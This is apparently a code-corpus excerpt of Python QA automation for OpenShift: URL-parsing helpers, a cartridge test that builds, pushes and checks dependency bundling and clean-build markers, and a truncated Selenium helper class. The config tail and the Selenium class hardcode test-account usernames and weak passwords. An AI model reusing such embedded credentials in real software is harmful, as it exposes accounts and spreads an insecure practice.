'new_user')\ngranted_user = 
[\"[email protected]\",\"123456\"]\ngranted_user2 = [\"[email protected]\",\"111111\"]\nrhn_user = [\"[email protected]\",\"redhat\"]\nexist_domain=configparse.get('environment', 'exist_domain')\nssh_key_file=configparse.get('environment', 'ssh_key_file')\ntochangepwduser = [\"[email protected]\",\"111111\",\"111111\"]\ndomainuser = [\"[email protected]\",\"111111\"]\nlibra_server=configparse.get('environment', 'libra_server')\ndashboard_path=url+\"/app/dashboard\"\ncontrol_panel=url+\"/app/control_panel\"\nregistration_page=url+\"/app/user/new\"\nexpress_registration_page=url+\"/app/user/new/express\"\nflex_registration_page=url+\"/app/user/new/flex\"\nflex_console=url+\"/flex/flex/index.html\"\n\n\n\n\ndef baseconfirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return confirmation_link[:pathstart]\n\ndef email(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return str.replace(str.replace(temp_email,\"%2B\",\"+\"),\"%40\",\"@\")\n\ndef invalidemail_confirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+ str.replace(path,temp_email,\"ere\")\n\ndef invalidkey_confirm_url(confirmation_link):\n# process_email_confirm_link(confirmation_link)\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+str.replace(path,key,\"rere\")\n\ndef noemail_confirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+path[:j-1]\n\ndef nokey_confirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+path[:m+1]+path[j+1:]\n\ndef validemail_confirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+path\n\n\n" }, { "alpha_fraction": 0.5562955141067505, "alphanum_fraction": 0.5663292407989502, "avg_line_length": 49.95701217651367, "blob_id": "4f4e149b66340e0e369af6515ce6ca06bb394bdb", "content_id": "b8dbab37ed03e03edc032a13f8054069f370911f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22524, "license_type": "no_license", "max_line_length": 197, "num_lines": 442, "path": "/automation/open/testmodules/RT/cartridge/server_side_bundling_libs_and_force_clean_build.py", 
"repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\n\nimport common\nimport OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'perl'\n if not common.app_types.has_key(self.test_variant):\n raise Exception(\"Invalid/Unknown variable: OPENSHIFT_test_name\")\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_name = common.getRandomString(10)\n self.app_type = common.app_types[self.test_variant]\n\n common.env_setup()\n\n # print test case summary\n self.info(\"\"\"\n[US561][rhc-cartridge] PHP: Pear pre-processing\n[US561][rhc-cartridge] Perl: Cpan pre-processing\n[US561][rhc-cartridge] Python: Easy_install pre-processing\n[US561][rhc-cartridge] Ruby: Gem pre-processing\n[US561][rhc-cartridge] Jboss: Maven pre-processing\n[US1107][rhc-cartridge] PHP app libraries cleanup using force_clean_build marker\n[US1107][rhc-cartridge] PERL app libraries cleanup using force_clean_build marker\n[US1107][rhc-cartridge] WSGI app libraries cleanup using force_clean_build marker\n[US1107][rhc-cartridge] RACK app libraries cleanup using force_clean_build marker\n[US1107][rhc-cartridge] JBOSSAS app libraries cleanup using force_clean_build marker\n[US590][Runtime][rhc-cartridge]nodejs app modules cleanup using force_clean_build marker\"\"\")\n\n def finalize(self):\n pass\n \nclass ServerSideBundlingLibsAndForceCleanBuild(OpenShiftTest):\n def test_method(self):\n\n # 1.Create an app\n self.add_step(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0)\n\n # 2.Customize this app\n if self.test_variant == \"php\":\n cmd = \"echo 'channel://pear.php.net/Validate-0.8.4' >%s/deplist.txt && cp -f %s/app_template/php_pear.php %s/php/index.php\" %(self.app_name, WORK_DIR, self.app_name)\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n cmd = \"\"\"cd %s && echo \"source 'http://rubygems.org'\\ngem 'rack'\\ngem 'pg'\" > Gemfile && sed -i \"/require 'thread-dump'/ d\" config.ru && bundle install\"\"\" %(self.app_name)\n elif self.test_variant in (\"python\",\"wsgi\"):\n cmd = \"cd %s && sed -i '9s/^#//g' setup.py && cp %s/app_template/wsgi-test.tar.gz ./ && tar xzvf wsgi-test.tar.gz\" %(self.app_name, WORK_DIR)\n elif self.test_variant == \"perl\":\n cmd = \"\"\"cd %s && echo -e '#!/usr/bin/perl\\nprint \"Content-type: text/html\\\\r\\\\n\\\\r\\\\n\";\\nprint \"Welcome to OpenShift\\\\n\";' >perl/index.pl && echo YAML >>deplist.txt\"\"\" %(self.app_name)\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd = \"cd %s && cp %s/app_template/helloworld.tar.gz ./ && tar zxf helloworld.tar.gz\" %(self.app_name, WORK_DIR)\n elif self.test_variant in (\"nodejs\"):\n cmd = \"\"\"cd %s && sed -i '{\\n/dependencies/ a\\\\\\n \"optimist\": \"0.3.4\"\\n}' package.json && sed -i \"4 i var argv = require('optimist').argv;\" server.js\"\"\" % (self.app_name)\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n self.add_step(\"2.Customize this app\",\n cmd,\n expect_description=\"the git repo should be modified successfully\",\n expect_return=0)\n\n # 3.Git push all the changes\n if self.test_variant == \"php\":\n exp_str = 
\"install ok: channel://pear.php.net/Validate-0.8.4\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n exp_str = \"Installing pg\"\n elif self.test_variant in (\"python\", \"wsgi\"):\n exp_str = \"Adding Django [\\d.]+ to easy-install.pth\"\n elif self.test_variant == \"perl\":\n exp_str = \"Successfully installed YAML\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n exp_str = \"remote: Downloading: .*javax.*\"\n elif self.test_variant in (\"nodejs\"):\n exp_str = \"remote: npm info install [email protected]\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n self.add_step(\"3.Git push all the changes\",\n \"cd %s && touch x && git add . && git commit -am t && git push\" %(self.app_name),\n expect_description=\"Git push should succeed\",\n expect_return=0,\n expect_str=[exp_str])\n\n # 4. Generate test script\n if self.test_variant == \"php\":\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}php/phplib/pear/pear/download/Validate-0.8.4.tgz && ls ${OPENSHIFT_HOMEDIR}php/phplib/pear/pear/php/Validate.php\"\n elif self.test_variant in (\"ruby\", \"rack\"):\n cmd_str = \"ls -la ${OPENSHIFT_REPO_DIR}vendor/bundle/ruby/1.8*/gems/pg*\"\n elif self.test_variant in (\"ruby-1.9\"):\n cmd_str = \"ls -la ${OPENSHIFT_REPO_DIR}vendor/bundle/ruby/1.9*/gems/pg*\"\n elif self.test_variant in (\"python\", \"wsgi\"):\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}python/virtenv/lib/python2.6/site-packages/Django*\"\n elif self.test_variant == \"perl\":\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}perl/perl5lib/lib/perl5/YAML\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}.m2/repository/javax\"\n elif self.test_variant in (\"nodejs\"):\n cmd_str = \"ls ${OPENSHIFT_REPO_DIR}node_modules/optimist/\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n shell_script = '''#!/bin/bash\nset -x\ncommand=\"%s\"\necho \"$command\"\neval \"$command\"\ntest $? == 0 && echo \"RESULT=0\" || echo \"RESULT=1\"''' %(cmd_str)\n self.add_step(\"4.Write .openshift/action_hooks/deploy\",\n \"echo '%s' >%s/.openshift/action_hooks/deploy && chmod +x %s/.openshift/action_hooks/deploy\" %(shell_script, self.app_name, self.app_name),\n expect_return=0)\n\n # 5.Check the dependencies are installed\n self.add_step(\"5.Check the dependencies are installed vir git hooks\",\n \"cd %s && touch xx && git add . 
&& git commit -am t && git push\" %(self.app_name),\n expect_description=\"Check should PASS\",\n expect_return=0,\n expect_str=[\"RESULT=0\"])\n\n # 6.Check app via browser\n def get_app_url(self, suffix=\"\"):\n def closure():\n return OSConf.get_app_url(self.app_name)+suffix\n return closure\n\n url_suffix=\"\"\n if self.test_variant == \"php\":\n test_html = \"get_correct_number\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n test_html = \"Welcome to OpenShift\"\n elif self.test_variant in (\"python\", \"wsgi\"):\n test_html = \"Congratulations on your first Django-powered page\"\n elif self.test_variant == \"perl\":\n test_html = \"Welcome to OpenShift\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n test_html = \"Hello World!\"\n url_suffix = \"/HelloWorld/HelloWorld\"\n elif self.test_variant in (\"nodejs\"):\n test_html = \"Welcome to OpenShift\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n self.add_step(\"6.Check app via browser\",\n common.grep_web_page,\n function_parameters=[get_app_url(self, url_suffix), test_html, \"-H 'Pragma: no-cache' -L\", 5, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0)\n\n # 7. Using the installed package\n if self.test_variant == \"php\":\n exp_str = \"\"\n unexp_str = \"remote: downloading\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n exp_str = \"remote: Using pg\"\n unexp_str = \"remote: Installing\"\n elif self.test_variant in (\"python\", \"wsgi\"):\n exp_str = \"\"\n unexp_str = \"remote: Downloading\"\n elif self.test_variant == \"perl\":\n exp_str = \"\"\n unexp_str = \"remote: Fetching\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n exp_str = \"\"\n unexp_str = \"remote: Downloading\"\n elif self.test_variant in (\"nodejs\"):\n exp_str = \"\"\n unexp_str = \"remote: npm http GET.*optimist\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n self.add_step(\"7. Re-using the installed libs, no new installation\",\n \"cd %s && touch xxx && git add . && git commit -am t && git push\" %(self.app_name),\n expect_description=\"Check should PASS\",\n expect_return=0,\n expect_str=[exp_str],\n unexpect_str=[unexp_str])\n\n # 8. More test for rack app\n if self.test_variant in ( \"rack\",\"ruby\", \"ruby-1.9\"):\n self.add_step(\n \"8. Edit Gemfile to add another gem we want to install,\",\n '''cd %s && echo \"gem 'rhc'\" >>Gemfile ; bundle check ; bundle install ; sed -i \"s/rhc \\(.*\\)/rhc \\(0.71.2\\)/g\" Gemfile.lock''' %(self.app_name),\n expect_return=0)\n\n self.add_step(\n \"9. Re-using the installed libs, and install new libs\",\n \"cd %s && git add . && git commit -am t && git push\" %(self.app_name),\n expect_return=0,\n expect_str=[\"remote: Using pg\", \"remote: Installing rhc\"])\n else:\n self.info(\"skip step 8\")\n self.info(\"skip step 9\")\n\n\n # 10. Touch a empty force_clean_build file in your local git repo\n self.add_step(\"10. Touch a empty force_clean_build file in your local git repo.\",\n \"touch %s/.openshift/markers/force_clean_build\" %(self.app_name),\n expect_description=\"Successfully touched force_clean_build\",\n expect_return=0)\n\n # 11. 
Remove libraries\n if self.test_variant == \"php\":\n cmd = \"echo '' > %s/deplist.txt\" %(self.app_name)\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd = \"echo 'No denpendency need to be remove for jbossas app'\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n cmd = \"cd %s && sed -i '$d' Gemfile && bundle check\" %(self.app_name)\n elif self.test_variant in (\"python\", \"wsgi\"):\n cmd = \"cd %s && sed -i '9s/^/#/g' setup.py\" %(self.app_name)\n elif self.test_variant == \"perl\":\n cmd = \"echo '' > %s/deplist.txt\" %(self.app_name)\n elif self.test_variant in (\"nodejs\"):\n cmd = \"cd %s && sed -i '{/optimist/ d}' package.json\" % (self.app_name)\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n self.add_step(\"11. Remove libraries dependency\",\n cmd,\n expect_description=\"Modification succeed\",\n expect_return=0)\n\n # 12. re-write .openshift/action_hooks/deploy\n if self.test_variant == \"php\":\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}php/phplib/pear/pear/download/Validate-0.8.4.tgz || ls ${OPENSHIFT_HOMEDIR}php/phplib/pear/pear/php/Validate.php\"\n cmd = \"\"\"sed -i 's#command=\"ls.*\"#command=\"%s\"#g' %s/.openshift/action_hooks/deploy\"\"\" %(cmd_str, self.app_name)\n elif self.test_variant in (\"ruby\", \"rack\"):\n cmd_str = \"ls ${OPENSHIFT_REPO_DIR}vendor/bundle/ruby/1.8*/gems/rhc*\"\n cmd = \"\"\"sed -i 's#command=\"ls.*\"#command=\"%s\"#g' %s/.openshift/action_hooks/deploy\"\"\" %(cmd_str, self.app_name)\n elif self.test_variant in (\"ruby-1.9\"):\n cmd_str = \"ls ${OPENSHIFT_REPO_DIR}vendor/bundle/ruby/1.9*/gems/rhc*\"\n cmd = \"\"\"sed -i 's#command=\"ls.*\"#command=\"%s\"#g' %s/.openshift/action_hooks/deploy\"\"\" %(cmd_str, self.app_name)\n elif self.test_variant == \"perl\":\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}perl/perl5lib/lib || ls ~/.cpanm/work\"\n cmd = \"\"\"sed -i 's#command=\"ls.*\"#command=\"%s\"#g' %s/.openshift/action_hooks/deploy\"\"\" %(cmd_str, self.app_name)\n elif self.test_variant in (\"python\", \"wsgi\"):\n cmd = \"echo 'No need to re-write for wsgi app'\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd = \"echo 'No need to re-write for jbossas app'\"\n elif self.test_variant in (\"nodejs\"):\n cmd = \"echo 'No need to re-write for jbossas app'\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n self.add_step(\"12. Re-write .openshift/action_hooks/deploy\",\n cmd,\n expect_return=0)\n\n # 13. 
git push all the changes\n        if self.test_variant in (\"jbossas\", \"jbosseap\"):\n            str_list = [\".openshift/markers/force_clean_build found\", \"remote: Downloading\"]\n            unexpect_str_list = []\n        elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n            str_list = [\"remote: Installing pg\", \"ls: cannot access\", \"RESULT=1\"]\n            unexpect_str_list = [\"remote: Installing rhc\"]\n        elif self.test_variant == \"php\":\n            str_list = [\".openshift/markers/force_clean_build found\", \"ls: cannot access\", \"RESULT=1\"]\n            unexpect_str_list = [\"remote: downloading\"]\n        elif self.test_variant == \"perl\":\n            str_list = [\".openshift/markers/force_clean_build found\", \"ls: cannot access\", \"RESULT=1\"]\n            unexpect_str_list = [\"remote: Fetching\"]\n        elif self.test_variant in (\"python\", \"wsgi\"):\n            str_list = [\".openshift/markers/force_clean_build found\", \"ls: cannot access\", \"RESULT=1\"]\n            unexpect_str_list = [\"remote: Downloading\"]\n        elif self.test_variant in (\"nodejs\"):\n            str_list = [\".openshift/markers/force_clean_build found! Recreating npm modules\", \"ls: cannot access\", \"RESULT=1\"]\n            unexpect_str_list = []\n        else:\n            return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n        self.add_step(\"13. git push all the changes\",\n                      \"cd %s && touch xxxx && git add . && git commit -am t && git push\"\n                      %(self.app_name),\n                      expect_description=\"libraries are removed successfully\",\n                      expect_return=0,\n                      expect_str=str_list,\n                      unexpect_str=unexpect_str_list)\n\n        # 14.Check app via browser\n        url_suffix=\"\"\n        if self.test_variant == \"php\":\n            test_html = \"\"\n            unexpect_test_html = \"get_correct_number\"\n        elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n            test_html = \"Welcome to OpenShift\"\n            unexpect_test_html = \"NO_XX\"\n        elif self.test_variant in (\"python\",\"wsgi\"):\n            test_html = \"Internal Server Error\"\n            unexpect_test_html = \"Congratulations on your first Django-powered page\"\n        elif self.test_variant == \"perl\":\n            test_html = \"Welcome to OpenShift\"\n            unexpect_test_html = \"NO_XX\"\n        elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n            test_html = \"Hello World!\"\n            unexpect_test_html = \"NO_XX\"\n            url_suffix = \"/HelloWorld/HelloWorld\"\n        elif self.test_variant in (\"nodejs\"):\n            test_html = \"Service Temporarily Unavailable\"\n            unexpect_test_html = \"Welcome to OpenShift\"\n        else:\n            return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n        self.add_step(\n            \"14. Check app via browser, php/wsgi apps should NOT be available now, jbossas/perl/rack should still work fine\",\n            \"curl -L -H 'Pragma: no-cache' %s\",\n            string_parameters = [get_app_url(self, url_suffix)],\n            expect_str=[test_html],\n            unexpect_str=[unexpect_test_html],\n            try_interval=9,\n            try_count=6)\n\n        # 15. 
Add libraries back\n if self.test_variant == \"php\":\n cmd = \"echo 'channel://pear.php.net/Validate-0.8.4' > %s/deplist.txt\" %(self.app_name)\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd = \"echo 'No denpendency need to be remove for jbossas app'\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n cmd = '''cd %s && echo \"gem 'rhc'\" >>Gemfile && bundle check && sed -i \"s/rhc \\(.*\\)/rhc \\(0.71.2\\)/g\" Gemfile.lock''' %(self.app_name)\n elif self.test_variant in (\"python\", \"wsgi\"):\n cmd = \"cd %s && sed -i '9s/^#//g' setup.py\" %(self.app_name)\n elif self.test_variant == \"perl\":\n cmd = \"echo 'YAML' > %s/deplist.txt\" %(self.app_name)\n elif self.test_variant in (\"nodejs\"):\n cmd = \"\"\"cd %s && sed -i '{\\n/dependencies/ a\\\\\\n \"optimist\": \"0.3.4\"\\n}' package.json\"\"\" % (self.app_name)\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n self.info(\"skip step 15 for jbossas app\")\n else:\n self.add_step(\"15. Added libraries denpendency back\",\n cmd,\n expect_return=0)\n\n # 16. re-write .openshift/action_hooks/deploy\n if self.test_variant == \"php\":\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}php/phplib/pear/pear/download/Validate-0.8.4.tgz \\&\\& ls ${OPENSHIFT_HOMEDIR}php-5.3/phplib/pear/pear/php/Validate.php\"\n cmd = \"\"\"sed -i 's#command=\"ls.*\"#command=\"%s\"#g' %s/.openshift/action_hooks/deploy\"\"\" %(cmd_str, self.app_name)\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n cmd = \"echo 'No need to re-write for rack app'\"\n elif self.test_variant == \"perl\":\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}perl/perl5lib/lib \\&\\& ls ~/.cpanm/work\"\n cmd = \"\"\"sed -i 's#command=\"ls.*\"#command=\"%s\"#g' %s/.openshift/action_hooks/deploy\"\"\" %(cmd_str, self.app_name)\n elif self.test_variant in (\"python\",\"wsgi\"):\n cmd = \"echo 'No need to re-write for wsgi app'\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd = \"echo 'No need to re-write for jbossas app'\"\n elif self.test_variant in (\"nodejs\"):\n cmd = \"echo 'No need to re-write for nodejs app'\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n print \"\\nskip step 16 for jbossas app\"\n else:\n self.add_step(\n \"16. Re-write .openshift/action_hooks/deploy\",\n cmd,\n expect_return=0)\n\n # 17. git push all the changes\n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n str_list = [\".openshift/markers/force_clean_build found\", \"remote: Downloading\"]\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n str_list = [\"remote: Installing pg\", \"remote: Installing rhc\", \"RESULT=0\"]\n unexpect_str_list = [\"No such file or directory\"]\n elif self.test_variant == \"php\":\n str_list = [\".openshift/markers/force_clean_build found\", \"remote: downloading\", \"RESULT=0\"]\n unexpect_str_list = [\"No such file or directory\"]\n elif self.test_variant == \"perl\":\n str_list = [\".openshift/markers/force_clean_build found\", \"remote: Fetching\", \"RESULT=0\"]\n unexpect_str_list = [\"No such file or directory\"]\n elif self.test_variant in (\"python\", \"wsgi\"):\n str_list = [\".openshift/markers/force_clean_build found\", \"remote: Downloading\", \"RESULT=0\"]\n unexpect_str_list = [\"No such file or directory\"]\n elif self.test_variant in (\"nodejs\"):\n str_list = [\".openshift/markers/force_clean_build found! 
Recreating npm modules\", \"RESULT=0\"]\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n self.info(\"skip step 17 for jbossas app\")\n else:\n self.add_step(\"17. git push all the changes\",\n \"cd %s && touch xxxxx && git add . && git commit -am t && git push\" %(self.app_name),\n expect_description=\"libraries are removed successfully\",\n expect_return=0,\n expect_str=str_list,\n unexpect_str=unexpect_str_list)\n\n # 18.Check app via browser\n if self.test_variant == \"php\":\n test_html = \"get_correct_number\"\n elif self.test_variant in (\"rack\",\"ruby\", \"ruby-1.9\"):\n test_html = \"Welcome to OpenShift\"\n elif self.test_variant in ( \"wsgi\", \"python\") :\n test_html = \"Congratulations on your first Django-powered page\"\n elif self.test_variant == \"perl\":\n test_html = \"Welcome to OpenShift\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n test_html = \"Hello World!\"\n elif self.test_variant in (\"nodejs\"):\n test_html = \"Welcome to OpenShift\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n self.info(\"skip step 18 for jbossas app\")\n else:\n self.add_step(\n \"18.Check app via browser, now all kinds of app should work fine\",\n \"curl -H 'Pragma: no-cache' %s\",\n string_parameters = [get_app_url(self)],\n expect_return=0,\n expect_str=[test_html],\n try_interval=9,\n try_count=3)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ServerSideBundlingLibsAndForceCleanBuild)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6336485743522644, "alphanum_fraction": 0.637607216835022, "avg_line_length": 37.274410247802734, "blob_id": "aa3f612c70ed03661c30325740df1db43f745b5c", "content_id": "a9c45d71b5be5b1b90705578946b6376be8e3371", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22735, "license_type": "no_license", "max_line_length": 125, "num_lines": 594, "path": "/automation/open/lib/autoweb.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport clog\nimport sys\nimport time\nimport unittest\nimport rhtest\n\n\"\"\"\nclass and support functions for web automation\n\n\"\"\"\n\nlog = clog.get_logger()\n\nclass AutoWeb(rhtest.Test, unittest.TestCase):\n log = log\n driver = None #webdriver.Firefox() #default\n browser = 'firefox'\n base_url = None\n proxy = False\n browserpath = 0\n platform = 'dev'\n domain = 'yujzhang2259'\n\n username_simple_account = '[email protected]'\n password_simple_account = 'redhat'\n username_both_registered_openshift_account = '[email protected]'\n password_both_registered_openshift_account = 'redhat'\n username_both_registered_RHN_account = 'mgaostg69'\n password_both_registered_RHN_account = '111111'\n username_RHN_account = 
'mgaostg59'\n username_email_of_RHN_account = '[email protected]'\n password_email_of_RHN_account = 'redhat'\n username_not_accept_terms_account = '[email protected]'\n password_not_accept_terms_account = 'redhat'\n\n \n def __init__(self, **kwargs):\n if kwargs.has_key('logger'):\n # use local global logger if none is given (with framework, then \n # the framework logger should be used.\n self.log = kwargs['logger']\n\n if kwargs.has_key('browser'):\n self.browser = kwargs['browser'].strip().lower()\n if kwargs.has_key('ip'):\n self.base_url = \"https://\" + kwargs['ip']\n if kwargs.has_key('browser_path'):\n self.browserpath = kwargs['browserpath']\n\n if kwargs.has_key('config'):\n self.config = kwargs['config']\n\n if kwargs.has_key('proxy'):\n self.proxy=kwargs['proxy']\n \n if self.proxy:\n print \"### setting proxy\"\n self.profile=webdriver.FirefoxProfile()\n self.profile.set_preference(\"network.proxy.type\", 1)\n self.profile.set_preference(\"network.proxy.http\", \"file.sjc.redhat.com\")\n self.profile.set_preference(\"network.proxy.http_port\", 3128)\n self.profile.set_preference(\"network.proxy.ssl\", \"file.sjc.redhat.com\")\n self.profile.set_preference(\"network.proxy.ssl_port\", 3128)\n self.driver = webdriver.Firefox(self.profile)\n else:\n self.driver = webdriver.Firefox()\n pass # self.info(\"xxx\", 1)\n self.verificationErrors = []\n\n\n def wait_element_present_by_link_text(self,name):\n self.do_wait(By.LINK_TEXT, name)\n \n def check_title(self, title):\n time.sleep(5)\n title_match = False\n for i in range(60):\n try:\n if title == self.driver.title:\n title_match = True\n break\n except:\n pass\n time.sleep(1)\n if not title_match:\n log.error(\"timed out, '%s' is not equal to '%s'\" % title, self.driver.title)\n\n def assert_element_not_present_by_css(self, css):\n try: self.assert_false(is_element_present(self, By.CSS_SELECTOR,css))\n except AssertionError as e: self.verificationErrors.append(str(e))\n \n def assert_element_present_by_css(self, css, msg=''):\n try: self.assert_true(self.is_element_present(By.CSS_SELECTOR,css))\n except AssertionError as e: self.verificationErrors.append(msg+\",\"+str(e))\n\n def assert_element_present_by_id(self, idname, msg=''):\n try: self.assert_true(self.is_element_present(By.ID,idname))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def assert_element_not_present_by_id(self, idname):\n try: self.assert_false(self.is_element_present(self, By.ID,idname))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def assert_element_present_by_xpath(self, xpath):\n try: self.assert_true(self.is_element_present(self, By.XPATH,xpath))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def assert_element_present_by_link_text(self, link_text):\n self.assert_true(self.is_element_present(By.LINK_TEXT,link_text))\n\n def assert_element_present_by_partial_link_text(self, partial_link_text):\n try: self.assert_true(is_element_present(self, By.PARTIAL_LINK_TEXT ,partial_link_text))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def assert_element_present_by_name(self, name):\n try: self.assert_true(is_element_present(self, By.NAME ,name))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def assert_element_present_by_class_name(self, class_name):\n try: self.assert_true(is_element_present(self, By.CLASS_NAME ,class_name))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def 
assert_element_present_by_tag_name(self, tag_name):\n try: self.assert_true(is_element_present(self, By.TAG_NAME ,tag_name))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n\n def assert_element_present(self, how,what):\n try: self.assert_true(is_element_present(self, how ,what))\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n def assert_text_equal_by_css(self, text,css, msg=''):\n try: self.assert_equal(text,self.driver.find_element_by_css_selector(css).text)\n except (AssertionError, NoSuchElementException) as e: self.verificationErrors.append(\"%s >> %s\"%(msg,str(e)))\n\n def assert_text_equal_by_xpath(self, text, xpath, msg=''):\n try: self.assert_equal(text,self.driver.find_element_by_xpath(xpath).text)\n except (AssertionError, NoSuchElementException) as e: self.verificationErrors.append(\"%s >> %s\"%(msg,str(e)))\n\n def assert_text_equal_by_partial_link_text(self, text, partial_link_text, msg=''):\n try: self.assertEqual(text,self.driver.find_element_by_partial_link_text(partial_link_text).text)\n except (AssertionError, NoSuchElementException) as e: self.verificationErrors.append(\"%s >> %s\"%(msg,str(e)))\n\n def assert_text_equal_by_id(self, text,id_name, msg=''):\n try: 